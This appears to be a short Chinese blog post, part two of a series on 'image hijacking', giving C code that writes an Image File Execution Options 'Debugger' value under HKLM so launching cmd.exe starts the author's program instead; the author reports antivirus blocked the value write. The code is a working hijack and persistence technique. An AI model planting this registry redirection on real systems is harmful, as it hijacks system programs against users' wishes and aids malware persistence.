映像劫持技术(2):实例

在Image File Execution Options下创建cmd.exe项,将其“重定向”到我们自己编写的程序

 1 #include<stdio.h>
 2 #include<windows.h>
 3 
// Demonstration of the IFEO ("Image File Execution Options") redirection described
// above: this program registers its own path as the "Debugger" value for Cmd.exe
// under HKLM, so that launching cmd.exe starts this program instead.
// From a defender's view, the write to the "Debugger" value under this key is the
// artifact worth monitoring; the post itself reports 360 blocking exactly that
// step. Writing under HKEY_LOCAL_MACHINE presumably needs elevated rights — the
// code does not check for that.
// Returns 0 in every case; success or failure is only reported via printf.
int main()
{
    HKEY ifeoKey;
    DWORD disposition = REG_CREATED_NEW_KEY;  // receives whether the subkey was created or already existed

    // Create (or open, if present) the per-image IFEO subkey for Cmd.exe.
    const LONG createStatus = ::RegCreateKeyEx(HKEY_LOCAL_MACHINE,
        "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Cmd.exe",
        0,
        NULL,
        REG_OPTION_NON_VOLATILE,
        KEY_ALL_ACCESS,
        NULL,
        &ifeoKey,
        &disposition);
    if (createStatus != ERROR_SUCCESS)
    {
        printf("fail to create a reg key.\n");
        return 0;
    }
    printf("success to Create the reg key.\n");

    // Point the Debugger value at this executable's own path; the byte count
    // handed to RegSetValueEx is whatever GetModuleFileName returned.
    char selfPath[MAX_PATH];
    const int pathLen = GetModuleFileName(NULL, selfPath, sizeof(selfPath));
    const int setStatus = RegSetValueEx(ifeoKey, "Debugger", 0, REG_SZ,
                                        (const unsigned char *)selfPath, pathLen);
    printf(setStatus == ERROR_SUCCESS
               ? "success to set the registry keys.\n"
               : "fail to set the registry keys.\n");

    RegCloseKey(ifeoKey);
    return 0;
}

 程序运行的结果只是创建了cmd.exe项；在设置该项的值的时候，360安全卫士报毒，设置不成功
